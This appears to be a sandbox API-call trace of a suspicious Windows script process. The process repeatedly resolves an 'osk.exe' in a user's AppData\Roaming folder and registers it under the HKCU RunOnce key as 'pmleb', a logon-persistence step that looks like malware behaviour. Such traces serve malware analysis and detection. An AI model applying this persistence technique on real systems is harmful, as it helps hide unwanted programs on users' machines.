[0081.188] IUnknown:Release (This=0x787518) returned 0x1 [0081.188] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.188] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.188] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.189] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.189] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.189] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, 
Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.189] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.189] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.189] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.189] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x26 [0081.189] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.189] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x27 [0081.189] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), 
pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.190] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x26 [0081.190] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.190] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.190] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.190] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.190] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.190] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.190] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.190] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.190] WideCharToMultiByte (in: 
CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.190] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.190] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.191] RegCloseKey (hKey=0x280) returned 0x0 [0081.191] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.191] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.191] SetTimer (hWnd=0x20280, nIDEvent=0x20a2, uElapse=0xa, lpTimerFunc=0x0) returned 0x20a2 [0081.191] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.203] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.203] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.204] KillTimer (hWnd=0x20280, uIDEvent=0x20a2) returned 1 [0081.204] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.204] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.204] IUnknown:Release (This=0x787518) returned 0x1 [0081.204] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, 
riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.204] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.204] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.204] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.204] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.204] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: 
ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.204] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.204] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.205] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.205] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x27 [0081.205] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.205] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x28 [0081.205] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.205] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x27 [0081.206] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.206] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.206] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.206] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.206] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.206] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.206] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.206] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", 
cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.206] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.206] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.206] RegCloseKey (hKey=0x280) returned 0x0 [0081.206] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.206] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.206] SetTimer (hWnd=0x20280, nIDEvent=0x20a3, uElapse=0xa, lpTimerFunc=0x0) returned 0x20a3 [0081.207] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.219] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.219] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.219] KillTimer (hWnd=0x20280, uIDEvent=0x20a3) returned 1 [0081.219] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.219] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.219] IUnknown:Release (This=0x787518) returned 0x1 [0081.220] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.220] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.220] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.220] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.220] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.220] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.220] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.220] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.220] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.220] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x28 [0081.220] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.220] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x29 [0081.220] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.221] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x28 [0081.221] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.221] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.221] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.221] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.221] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.221] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.221] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.221] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 54 [0081.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.222] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.222] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.222] RegCloseKey (hKey=0x280) returned 0x0 [0081.222] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.222] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.222] SetTimer (hWnd=0x20280, nIDEvent=0x20a4, uElapse=0xa, lpTimerFunc=0x0) returned 0x20a4 [0081.222] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.235] TranslateMessage 